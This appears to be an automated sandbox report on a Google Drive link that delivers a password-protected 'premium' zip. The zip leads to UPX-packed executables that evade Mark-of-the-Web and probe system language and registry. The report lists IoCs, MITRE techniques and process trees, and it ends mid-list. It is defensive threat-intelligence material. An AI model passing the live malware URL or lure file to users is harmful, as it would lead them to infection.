hxxps://drive[.]google[.]com/file/d/135ptOrDFJctoyWeglHiATzgE28Q2Rmwb/view?pli=1

Analysis

max time kernel
92s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
03-02-2025 21:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/135ptOrDFJctoyWeglHiATzgE28Q2Rmwb/view?pli=1

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4620	extd.exe
1044	extd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
9	drive.google.com
1	drive.google.com

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001c00000002ab61-167.dat	upx
behavioral1/memory/4620-169-0x0000000000400000-0x00000000004A5000-memory.dmp	upx
behavioral1/memory/4620-171-0x0000000000400000-0x00000000004A5000-memory.dmp	upx
behavioral1/memory/1044-180-0x0000000000400000-0x00000000004A5000-memory.dmp	upx

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B4170MAY\premium[1].exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	premium.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000d3bbf1dfaf18db016420841ab518db013b48cfb68576db0114000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874433"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 760032008ce60400435a4dae20005041535331327e312e5a495000005a0009000400efbe435a4dae435a51ae2e00000051ab020000001a0000000000000000000000000000000be689007000610073007300200031003200330020007000720065006d00690075006d002e007a006900700000001c000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "3"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\pass 123 premium.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B4170MAY\premium[1].exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2792	msedge.exe
2792	msedge.exe
1600	msedge.exe
1600	msedge.exe
1888	identity_helper.exe
1888	identity_helper.exe
576	msedge.exe
576	msedge.exe
3376	msedge.exe
3376	msedge.exe
1616	msedge.exe
1616	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe
1600	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1616	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1600 wrote to memory of 2644	1600	msedge.exe	77
PID 1600 wrote to memory of 2644	1600	msedge.exe	77
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 4212	1600	msedge.exe	78
PID 1600 wrote to memory of 2792	1600	msedge.exe	79
PID 1600 wrote to memory of 2792	1600	msedge.exe	79
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80
PID 1600 wrote to memory of 4868	1600	msedge.exe	80

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.google.com/file/d/135ptOrDFJctoyWeglHiATzgE28Q2Rmwb/view?pli=1
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff72a53cb8,0x7fff72a53cc8,0x7fff72a53cd8
  2⤵
  PID:2644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:4212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:1536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:3980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1796,1970768939366668393,15398892281482713107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
